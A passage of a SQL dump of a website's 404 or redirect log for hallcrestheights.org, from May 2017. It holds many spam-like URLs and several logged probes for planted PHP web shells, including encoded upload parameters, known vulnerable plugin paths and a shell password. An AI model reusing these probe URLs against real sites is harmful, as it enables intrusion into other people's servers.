05:16:54','0000-00-00 00:00:00'),(8781,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:17:05','0000-00-00 00:00:00'),(8782,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:17:29','0000-00-00 00:00:00'),(8783,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:17:54','0000-00-00 00:00:00'),(8784,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:18:22','0000-00-00 00:00:00'),(8785,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-05-04 05:18:47','0000-00-00 00:00:00'),(8786,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:19:14','0000-00-00 00:00:00'),(8787,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:19:39','0000-00-00 00:00:00'),(8788,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:19:52','0000-00-00 00:00:00'),(8789,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:20:40','0000-00-00 00:00:00'),(8790,'http://hallcrestheights.org/head.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:21:01','0000-00-00 00:00:00'),(8791,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:21:49','0000-00-00 00:00:00'),(8792,'http://hallcrestheights.org/wp-content/plugins/morepaddy.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:22:14','0000-00-00 00:00:00'),(8793,'http://hallcrestheights.org/cache/list.php?z3=Y1RTTmpCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:22:39','0000-00-00 00:00:00'),(8794,'http://hallcrestheights.org/images/interface.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-04 05:23:58','0000-00-00 00:00:00'),(8795,'http://hallcrestheights.org/sqldebug.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:24:13','0000-00-00 00:00:00'),(8796,'http://hallcrestheights.org/xmlrpc-activate.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:24:41','0000-00-00 00:00:00'),(8797,'http://hallcrestheights.org/keep.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:25:44','0000-00-00 00:00:00'),(8798,'http://hallcrestheights.org/tmpos.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:26:28','0000-00-00 00:00:00'),(8799,'http://hallcrestheights.org/link.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:26:49','0000-00-00 00:00:00'),(8800,'http://hallcrestheights.org/dcodzu.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:27:13','0000-00-00 00:00:00'),(8801,'http://hallcrestheights.org/codd.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:27:44','0000-00-00 00:00:00'),(8802,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=Y1RTTmpCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:28:08','0000-00-00 00:00:00'),(8803,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=Y1RTTmpCLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:28:30','0000-00-00 00:00:00'),(8804,'http://hallcrestheights.org/content.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:28:55','0000-00-00 00:00:00'),(8805,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:29:21','0000-00-00 00:00:00'),(8806,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:29:47','0000-00-00 00:00:00'),(8807,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-04 05:31:08','0000-00-00 00:00:00'),(8808,'http://hallcrestheights.org/shootmei.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:31:20','0000-00-00 00:00:00'),(8809,'http://hallcrestheights.org/dcodqg.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:31:39','0000-00-00 00:00:00'),(8810,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/cTSNjB.php',NULL,'','',1,0,'2017-05-04 05:32:04','0000-00-00 00:00:00'),(8811,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/cTSNjB.php',NULL,'','',1,0,'2017-05-04 05:32:15','0000-00-00 00:00:00'),(8812,'http://hallcrestheights.org/wp-content/uploads/cTSNjB.php',NULL,'','',1,0,'2017-05-04 05:32:27','0000-00-00 00:00:00'),(8813,'http://hallcrestheights.org/cTSNjB.php',NULL,'','',1,0,'2017-05-04 05:32:39','0000-00-00 00:00:00'),(8814,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/cTSNjB.php',NULL,'','',1,0,'2017-05-04 05:32:50','0000-00-00 00:00:00'),(8815,'http://hallcrestheights.org/wp-includes/css/admin-bar-rtl.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-04 05:34:34','0000-00-00 00:00:00'),(8816,'http://hallcrestheights.org/nowayfile.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-04 05:34:39','0000-00-00 00:00:00'),(8817,'http://hallcrestheights.org/wp-content/plugins/wp-file/lang/up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-04 05:36:13','0000-00-00 00:00:00'),(8818,'http://www.hallcrestheights.org/i20162636-k29276-fadlaj-fnlgfp-cvwgmy-hdec.htm',NULL,'','',2,0,'2017-05-04 05:45:43','0000-00-00 00:00:00'),(8819,'http://www.hallcrestheights.org/i20162635-htxwh-ykrsvs-k45277-vhudy-kbqx-dosfiet/',NULL,'','',1,0,'2017-05-04 07:17:17','0000-00-00 00:00:00'),(8820,'http://www.hallcrestheights.org/ixnm-ueahwhi-i20162630-k40532-ozhjx-bnwpge-yooayik-uksszqce.htm',NULL,'','',2,0,'2017-05-04 07:33:33','0000-00-00 00:00:00'),(8821,'http://www.hallcrestheights.org/qlbow-ciggec-i20162636-eayaf-xrgl-nikghhm-k37337-bbxpgesm/',NULL,'','',2,0,'2017-05-04 08:07:47','0000-00-00 00:00:00'),(8822,'http://www.hallcrestheights.org/k58765-bsoa-i20162633-pazapst-asgmhcq-cmckf-rdtfk-gpvbchs-iwho/',NULL,'','',2,0,'2017-05-04 08:34:55','0000-00-00 00:00:00'),(8823,'http://www.hallcrestheights.org/fadlajfn-lgfpc-i20162630-k50180-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-05-04 09:37:13','0000-00-00 00:00:00'),(8824,'http://www.hallcrestheights.org/i20162634-yembjvht-qqdc-kzfltzt-erqbwnsw-nsnjplpf-k60161-trrj/',NULL,'','',2,0,'2017-05-04 10:15:54','0000-00-00 00:00:00'),(8825,'http://www.hallcrestheights.org/k44792-lugd-ltrsmxx-i20162630-hypzq-jllzoh.htm',NULL,'','',2,0,'2017-05-04 10:31:15','0000-00-00 00:00:00'),(8826,'http://www.hallcrestheights.org/i20162635-wbwpbo-nkydhxjj-ikvf-vtzpx-k23929-bxkc/',NULL,'','',2,0,'2017-05-04 10:45:00','0000-00-00 00:00:00'),(8827,'http://www.hallcrestheights.org/i20162632-k33236-pcscqr-ufunpk-wxpoid-eotw.htm',NULL,'','',2,0,'2017-05-04 12:10:48','0000-00-00 00:00:00'),(8828,'http://www.hallcrestheights.org/nfrko-pdobbu-i20162634-k50017-mgolz-esrk-wtzqtqb-svjcwjbx-nmyvsssl/',NULL,'','',2,0,'2017-05-04 12:34:43','0000-00-00 00:00:00'),(8829,'http://www.hallcrestheights.org/tkuykfjd-njjb-ucyupaj-i20162628-aylrlwfv-dyruqpkl-k28201-sdef-hxdf/',NULL,'','',2,0,'2017-05-04 12:43:53','0000-00-00 00:00:00'),(8830,'http://www.hallcrestheights.org/nfrko-i20162635-pdobbu-mgolz-esrk-wtzqtqb-k45077-svjcwjbx/',NULL,'','',2,0,'2017-05-04 13:06:41','0000-00-00 00:00:00'),(8831,'http://www.hallcrestheights.org/kzpf-i20162637-k27845-fmsxklr-dedhwge-fvbbg/',NULL,'','',2,0,'2017-05-04 14:15:23','0000-00-00 00:00:00'),(8832,'http://www.hallcrestheights.org/dvis-ciwbvwk-i20162630-k45392-uxkrb-zomsmv-uclzuph-vqawuoxz.htm',NULL,'','',2,0,'2017-05-04 14:59:28','0000-00-00 00:00:00'),(8833,'http://www.hallcrestheights.org/i20162636-ajqxxuc-k10673-uzaof-ifephi-ijimjn/',NULL,'','',2,0,'2017-05-04 15:30:02','0000-00-00 00:00:00'),(8834,'http://www.hallcrestheights.org/k27476-lugdlt-i20162637-rsmxxh-ypzqjl-lzoh.htm',NULL,'','',2,0,'2017-05-04 16:16:31','0000-00-00 00:00:00'),(8835,'http://www.hallcrestheights.org/i20162632-bsoapa-zapstasg-mhcq-cmckf-k27409-rdtf-kgpvbch-siwhork/',NULL,'','',2,0,'2017-05-04 16:26:30','0000-00-00 00:00:00'),(8836,'http://www.hallcrestheights.org/dvisci-wbvwku-k28076-xkrbzo-i20162637-msmv-uclzup-hvqawu.htm',NULL,'','',2,0,'2017-05-04 16:34:26','0000-00-00 00:00:00'),(8837,'http://www.hallcrestheights.org/kzpf-i20162629-k37205-fmsxklr-dedhwge-fvbbg/',NULL,'','',2,0,'2017-05-04 16:45:17','0000-00-00 00:00:00'),(8838,'http://www.hallcrestheights.org/i20162630-k62080-gnfznxvj-xpalt-itjshkyj-yldpija-amdu.htm',NULL,'','',2,0,'2017-05-04 16:46:03','0000-00-00 00:00:00'),(8839,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf-i20162637-vtzpx-bxkcw-k51125-jybtylw/',NULL,'','',2,0,'2017-05-04 17:17:13','0000-00-00 00:00:00'),(8840,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos-qxoq/kgqaqyd-cptznzvt-jqoevpca-i20162635-qwjaluw-tybckbsx-bnbgn-ndor-k14627-cajppe/',NULL,'','',2,0,'2017-05-04 17:25:07','0000-00-00 00:00:00'),(8841,'http://www.hallcrestheights.org/yembj-i20162636-vhtqqd-k58237-ckzfl-tzte-rqbwnsw/',NULL,'','',2,0,'2017-05-04 18:43:39','0000-00-00 00:00:00'),(8842,'http://www.hallcrestheights.org/tkuyk-i20162637-k32777-fjdnjj-bucyu-paja/',NULL,'','',2,0,'2017-05-04 21:05:14','0000-00-00 00:00:00'),(8843,'http://www.hallcrestheights.org/i20162628-k13184-edzvd-lqco-mnnm-mcawvbfu.htm',NULL,'','',2,0,'2017-05-04 21:56:08','0000-00-00 00:00:00'),(8844,'http://www.hallcrestheights.org/ryvhr-hmqt-i20162634-k31684-yysl-lgeajanp-dmefnxhq-fhjdyh-aoxrc.htm',NULL,'','',2,0,'2017-05-04 23:55:13','0000-00-00 00:00:00'),(8845,'http://www.hallcrestheights.org/yembjvh-i20162636-tqqdc-kzfltz-k33433-terqbw-nswns/',NULL,'','',2,0,'2017-05-05 00:47:40','0000-00-00 00:00:00'),(8846,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-i20162632-yupa-jaylr-k39589-lwfv/',NULL,'','',3,0,'2017-05-05 01:21:25','0000-00-00 00:00:00'),(8847,'http://www.hallcrestheights.org/i20162628-pcscqr-ufunpk-k5936-wxpoid-eotw-tvsoar-mosmge.htm',NULL,'','',2,0,'2017-05-05 01:33:37','0000-00-00 00:00:00'),(8848,'http://www.hallcrestheights.org/ajqxx-k35477-ucuzao-fifep-i20162635-hiij/',NULL,'','',2,0,'2017-05-05 02:18:20','0000-00-00 00:00:00'),(8849,'http://www.hallcrestheights.org/k35077-soegs-zxyife-tvtnd-i20162635-yuuh-vfcyzls-xxqroxae-hkskxyxe/',NULL,'','',2,0,'2017-05-05 02:41:39','0000-00-00 00:00:00'),(8850,'http://www.hallcrestheights.org/zmkuedtz-i20162629-jivyo-k14180-qxifgxuh-xptvuhm-iwnz-korpv.htm',NULL,'','',2,0,'2017-05-05 03:14:58','0000-00-00 00:00:00'),(8851,'http://www.hallcrestheights.org/yembjvh-tqqdc-k31873-kzfltz-terqbw-i20162636-nswns-njpl-pftrrj/',NULL,'','',2,0,'2017-05-05 03:39:47','0000-00-00 00:00:00'),(8852,'http://www.hallcrestheights.org/wbwpb-k3077-onkydh-xjjik-i20162635-vfvt/',NULL,'','',2,0,'2017-05-05 04:06:26','0000-00-00 00:00:00'),(8853,'http://www.hallcrestheights.org/ixnmue-k27376-ahwhio-i20162637-zhjxbn-wpge-yooayi.htm',NULL,'','',2,0,'2017-05-05 04:35:01','0000-00-00 00:00:00'),(8854,'http://www.hallcrestheights.org/i20162628-kzpf-k9125-fmsxklr-dedhwge-fvbbg/',NULL,'','',2,0,'2017-05-05 04:45:57','0000-00-00 00:00:00'),(8855,'http://www.hallcrestheights.org/fadlajfn-lgfpc-i20162630-k61880-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',2,0,'2017-05-05 05:42:56','0000-00-00 00:00:00'),(8856,'http://www.hallcrestheights.org/i20162628-cwhriwgp-k7001-ekzq-dwkvumz-bsaiimjz/',NULL,'','',1,0,'2017-05-05 07:40:48','0000-00-00 00:00:00'),(8857,'http://www.hallcrestheights.org/edzvdlqc-i20162629-omnnm-k61700-mcawvbfu-japyvrl-flxh-qjkuh.htm',NULL,'','',3,0,'2017-05-05 08:19:15','0000-00-00 00:00:00'),(8858,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-jaylr-i20162629-k25549-lwfv/',NULL,'','',4,0,'2017-05-05 09:11:45','0000-00-00 00:00:00'),(8859,'http://www.hallcrestheights.org/pcscqr-k12436-ufunpk-i20162632-wxpoid-eotw-tvsoar.htm',NULL,'','',2,0,'2017-05-05 09:16:15','0000-00-00 00:00:00'),(8860,'http://www.hallcrestheights.org/htxw-hykrsvs-vhudykb-i20162637-qxdos-fiety-k27545-uaixnrb/',NULL,'','',2,0,'2017-05-05 09:16:47','0000-00-00 00:00:00'),(8861,'http://www.hallcrestheights.org/ajqxxucu-k18161-zaof-ifephii-i20162635-jimjnjbo/',NULL,'','',2,0,'2017-05-05 09:33:37','0000-00-00 00:00:00'),(8862,'http://www.hallcrestheights.org/k61532-ryvh-rhmqtyy-i20162630-sllge-ajanpd.htm',NULL,'','',1,0,'2017-05-05 09:56:52','0000-00-00 00:00:00'),(8863,'http://www.hallcrestheights.org/k14380-edzvdlqc-omnnm-mcawvbfu-japyvrl-i20162629-flxh.htm',NULL,'','',2,0,'2017-05-05 10:13:19','0000-00-00 00:00:00'),(8864,'http://www.hallcrestheights.org/wbwpbo-i20162629-k4949-nkydhxjj-ikvf-vtzpx/',NULL,'','',2,0,'2017-05-05 10:28:52','0000-00-00 00:00:00'),(8865,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k14180-qxifgxuh-i20162631-xptvuhm-iwnz-korpv.htm',NULL,'','',2,0,'2017-05-05 10:35:28','0000-00-00 00:00:00'),(8866,'http://www.hallcrestheights.org/qlbo-i20162633-wciggec-eayafxr-glnik-ghhmb-bxpgesm-k38065-rcai/',NULL,'','',1,0,'2017-05-05 11:25:17','0000-00-00 00:00:00'),(8867,'http://www.hallcrestheights.org/yembj-vhtqqd-k44977-ckzfl-i20162635-tzte-rqbwnsw-nsnjplpf-trrjncyp/',NULL,'','',2,0,'2017-05-05 11:26:21','0000-00-00 00:00:00'),(8868,'http://www.hallcrestheights.org/yembj-k46277-vhtqqd-ckzfl-i20162635-tzte/',NULL,'','',2,0,'2017-05-05 12:28:19','0000-00-00 00:00:00'),(8869,'http://www.hallcrestheights.org/jglet-k10984-kymd-i20162634-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl.htm',NULL,'','',2,0,'2017-05-05 12:39:48','0000-00-00 00:00:00'),(8870,'http://www.hallcrestheights.org/xhajvqlw-k27601-czbi-qsosqxo-i20162628-qkgqaqyd-cptznzvt/',NULL,'','',2,0,'2017-05-05 12:44:04','0000-00-00 00:00:00'),(8871,'http://www.hallcrestheights.org/edzvdl-qcomnn-mmcawv-bfuj-i20162629-k25456-apyvrl-flxhqj-kuhkc.htm',NULL,'','',1,0,'2017-05-05 13:32:32','0000-00-00 00:00:00'),(8872,'http://www.hallcrestheights.org/xhajvq-k23129-lwczbiqs-osqx-i20162635-oqkgq/',NULL,'','',2,0,'2017-05-05 14:15:53','0000-00-00 00:00:00'),(8873,'http://www.hallcrestheights.org/lugdltr-i20162629-smxxhypz-k11408-qjllzohn-jumntec-wfogyw-biwyr.htm',NULL,'','',2,0,'2017-05-05 14:22:11','0000-00-00 00:00:00'),(8874,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-hiij/imjnjbo-i20162635-gtsakbcc-gyfmdvju-k34827-xzlekts-lshxosqq-jvfyo/',NULL,'','',1,0,'2017-05-05 14:36:47','0000-00-00 00:00:00'),(8875,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-i20162637-jshkyjyl-k43828-dpijaam-durtae.htm',NULL,'','',2,0,'2017-05-05 14:58:57','0000-00-00 00:00:00'),(8876,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-i20162635-k2929-jaylr-lwfv-dyruqpk-lsdefhx/',NULL,'','',2,0,'2017-05-05 15:11:19','0000-00-00 00:00:00'),(8877,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-k22928-bzomsmvu-i20162637-clzuphv-qawuox-zmnpz.htm',NULL,'','',2,0,'2017-05-05 15:25:54','0000-00-00 00:00:00'),(8878,'http://www.hallcrestheights.org/i20162632-k52784-upttm-nbea-tgrb-nqcdcncx.htm',NULL,'','',2,0,'2017-05-05 15:59:04','0000-00-00 00:00:00'),(8879,'http://www.hallcrestheights.org/k34384-jglet-kymd-rqzn-i20162628-rvmlkswa-zvkecqqn-eeiaqj-zlnpl.htm',NULL,'','',2,0,'2017-05-05 17:05:24','0000-00-00 00:00:00'),(8880,'http://www.hallcrestheights.org/vqjnyspv-i20162635-holjp-k23180-eurrtpil-uourxiv-lbtr-hnnmt.htm',NULL,'','',2,0,'2017-05-05 17:15:01','0000-00-00 00:00:00'),(8881,'http://www.hallcrestheights.org/xhajv-k4877-qlwczb-iqsos-i20162635-qxoq/',NULL,'','',2,0,'2017-05-05 19:44:13','0000-00-00 00:00:00'),(8882,'http://www.hallcrestheights.org/yembjvht-k32341-qqdc-kzfltzt-erqbwnsw-i20162629-nsnjplpf-trrj-ncyp/',NULL,'','',2,0,'2017-05-05 20:13:26','0000-00-00 00:00:00'),(8883,'http://www.hallcrestheights.org/ajqx-xucuzao-k51025-fifephi-ijimj-njbog-i20162637-tsakbcc-gyfm/',NULL,'','',3,0,'2017-05-05 20:15:34','0000-00-00 00:00:00'),(8884,'http://www.hallcrestheights.org/i20162632-kzpffm-k26909-sxklrded-hwge-fvbbg/',NULL,'','',2,0,'2017-05-05 20:21:19','0000-00-00 00:00:00'),(8885,'http://www.hallcrestheights.org/i20162635-kzpff-msxklr/k35827-dedhw-gefv-bbgzagp/',NULL,'','',2,0,'2017-05-05 22:49:40','0000-00-00 00:00:00'),(8886,'http://www.hallcrestheights.org/i20162632-vqjnys-pvholj-peurrt-k33736-pilu-ourxiv-lbtrhn-nmtqz.htm',NULL,'','',2,0,'2017-05-06 00:40:23','0000-00-00 00:00:00'),(8887,'http://www.hallcrestheights.org/bsoapa-k24029-zapstasg-mhcq-i20162635-cmckf/',NULL,'','',1,0,'2017-05-06 01:38:03','0000-00-00 00:00:00'),(8888,'http://hallcrestheights.org/error_log.php?muie=all',NULL,'','',6,0,'2017-05-06 02:08:04','0000-00-00 00:00:00'),(8889,'http://www.hallcrestheights.org/k59192-ryvh-rhmqtyy-sllge-i20162631-ajanpd.htm',NULL,'','',2,0,'2017-05-06 02:23:49','0000-00-00 00:00:00'),(8890,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx-k57553-oqkgqa-i20162629-qydcp/',NULL,'','',2,0,'2017-05-06 03:04:40','0000-00-00 00:00:00'),(8891,'http://www.hallcrestheights.org/i20162635-bsoapa-zapstasg-mhcq-cmckf-k3229-rdtf/',NULL,'','',2,0,'2017-05-06 03:35:04','0000-00-00 00:00:00'),(8892,'http://www.hallcrestheights.org/i20162632-htxwhy-krsvsvhu-dykb-qxdos-fiet-yuaixnr-k5809-bdggsaa/',NULL,'','',2,0,'2017-05-06 05:33:51','0000-00-00 00:00:00'),(8893,'http://www.hallcrestheights.org/soegszx-i20162636-yifet-vtndyu-k11833-uhvfcy-zlsxx/',NULL,'','',2,0,'2017-05-06 07:53:33','0000-00-00 00:00:00'),(8894,'http://www.hallcrestheights.org/k44180-mrcqgbei-fuwgr-abtnwyrq-i20162635-semgwko.htm',NULL,'','',1,0,'2017-05-06 08:03:26','0000-00-00 00:00:00'),(8895,'http://www.hallcrestheights.org/i20162635-ajqxx-ucuzao-k14677-fifep-hiij-imjnjbo/',NULL,'','',2,0,'2017-05-06 08:27:57','0000-00-00 00:00:00'),(8896,'http://www.hallcrestheights.org/cwhr-iwgpekz-qdwkvum-i20162637-zbsai-imjzf-k6845-ozgdvdd/',NULL,'','',2,0,'2017-05-06 08:31:39','0000-00-00 00:00:00'),(8897,'http://www.hallcrestheights.org/cwhr-i20162637-k50525-iwgpekz-qdwkvum-zbsai/',NULL,'','',2,0,'2017-05-06 09:26:42','0000-00-00 00:00:00'),(8898,'http://www.hallcrestheights.org/k9025-soeg-szxyife-tvtndyu-i20162628-uhvfc-yzlsx/',NULL,'','',1,0,'2017-05-06 09:50:07','0000-00-00 00:00:00'),(8899,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx-oqkgq-aqydc-i20162637-k27445-ptznzvt-jqoe/',NULL,'','',2,0,'2017-05-06 10:40:58','0000-00-00 00:00:00'),(8900,'http://www.hallcrestheights.org/lugdlt-i20162636-k30076-rsmxxh-ypzqjl-lzoh-njumnt.htm',NULL,'','',2,0,'2017-05-06 10:48:18','0000-00-00 00:00:00'),(8901,'http://www.hallcrestheights.org/i20162632-oiyizg-k6209-olrcmwfb-snop-dgfnh/',NULL,'','',2,0,'2017-05-06 13:36:26','0000-00-00 00:00:00'),(8902,'http://www.hallcrestheights.org/bsoapaz-k12433-apsta-sgmhcq-cmckfr-i20162636-dtfkg-pvbc-hsiwho/',NULL,'','',7,0,'2017-05-06 16:02:56','0000-00-00 00:00:00'),(8903,'http://www.hallcrestheights.org/k10484-mrcqg-beif-i20162634-uwgr-abtnwyrq.htm',NULL,'','',2,0,'2017-05-06 17:04:15','0000-00-00 00:00:00'),(8904,'http://www.hallcrestheights.org/tkuykf-i20162635-jdnjjbuc-yupa-jaylr-lwfv-k23729-dyruqpk/',NULL,'','',2,0,'2017-05-06 21:06:56','0000-00-00 00:00:00'),(8905,'http://www.hallcrestheights.org/ajqxxu-i20162635-cuzaofif-ephi-ijimj-njbo-k3029-gtsakbc/',NULL,'','',2,0,'2017-05-07 00:23:32','0000-00-00 00:00:00'),(8906,'http://www.hallcrestheights.org/ajqxxucu-zaof-ifephii-i20162628-jimjnjbo-k7501-gtsakbcc-gyfm-dvju/',NULL,'','',3,0,'2017-05-07 03:49:51','0000-00-00 00:00:00'),(8907,'http://www.hallcrestheights.org/htxwhykr-k6901-svsv-hudykbq-i20162628-xdosfiet-yuaixnrb/',NULL,'','',1,0,'2017-05-07 04:08:03','0000-00-00 00:00:00'),(8908,'http://www.hallcrestheights.org/htxwhykr-k60461-svsv-i20162634-hudykbq-xdosfiet/',NULL,'','',2,0,'2017-05-07 06:04:08','0000-00-00 00:00:00'),(8909,'http://www.hallcrestheights.org/zmkued-tzjivy-k33836-oqxifg-xuhx-i20162632-ptvuhm-iwnzko.htm',NULL,'','',2,0,'2017-05-07 14:05:22','0000-00-00 00:00:00'),(8910,'http://www.hallcrestheights.org/files/HH_Newsletter_June_2013.pdf',NULL,'','',1,0,'2017-05-07 16:20:57','0000-00-00 00:00:00'),(8911,'http://www.hallcrestheights.org/k45656-fadlaj-i20162629-fnlgfp-cvwgmy-hdec.htm',NULL,'','',2,0,'2017-05-07 16:45:48','0000-00-00 00:00:00'),(8912,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-i20162635-gefv-bbgzagp-eciyyuwu-k14377-vfztjigj/',NULL,'','',2,0,'2017-05-07 17:04:03','0000-00-00 00:00:00'),(8913,'http://www.hallcrestheights.org/bsoapaza-i20162629-k7181-psta-sgmhcqc-mckfrdtf/',NULL,'','',1,0,'2017-05-07 17:11:43','0000-00-00 00:00:00'),(8914,'http://www.hallcrestheights.org/k3577-xhajv-qlwczb-iqsos-i20162635-qxoq-kgqaqyd-cptznzvt-jqoevpca/',NULL,'','',2,0,'2017-05-07 17:59:48','0000-00-00 00:00:00'),(8915,'http://www.hallcrestheights.org/i20162635-nfrko-pdobbu-k4777-mgolz-esrk-wtzqtqb/',NULL,'','',1,0,'2017-05-07 18:37:47','0000-00-00 00:00:00'),(8916,'http://www.hallcrestheights.org/k16405-kzpf-fmsxklr-dedhwge-fvbbg-i20162629-zagpe/',NULL,'','',6,0,'2017-05-07 19:31:10','0000-00-00 00:00:00'),(8917,'http://www.hallcrestheights.org/qlbowcig-k60061-gece-i20162634-ayafxrg-lnikghhm-bbxpgesm-rcai-ztbi/',NULL,'','',2,0,'2017-05-07 20:58:45','0000-00-00 00:00:00'),(8918,'http://www.hallcrestheights.org/k62000-ryvhrhmq-i20162629-tyysl-lgeajanp-dmefnxh.htm',NULL,'','',1,0,'2017-05-07 21:45:28','0000-00-00 00:00:00'),(8919,'http://www.hallcrestheights.org/fadlajfn-i20162629-lgfpc-k15080-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',2,0,'2017-05-07 22:55:33','0000-00-00 00:00:00'),(8920,'http://www.hallcrestheights.org/upttmnbe-i20162629-atgrb-k35780-nqcdcncx-rdhcpgz-zdll-imvyx.htm',NULL,'','',2,0,'2017-05-08 01:42:26','0000-00-00 00:00:00'),(8921,'http://www.hallcrestheights.org/i20162628-ajqxxucu-zaof-ifephii-jimjnjbo-gtsakbcc-k28301-gyfm/',NULL,'','',2,0,'2017-05-08 05:28:23','0000-00-00 00:00:00'),(8922,'http://hallcrestheights.org/sqlbak.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-08 06:05:10','0000-00-00 00:00:00'),(8923,'http://hallcrestheights.org/sql-bak.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:05:16','0000-00-00 00:00:00'),(8924,'http://hallcrestheights.org/email.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:05:38','0000-00-00 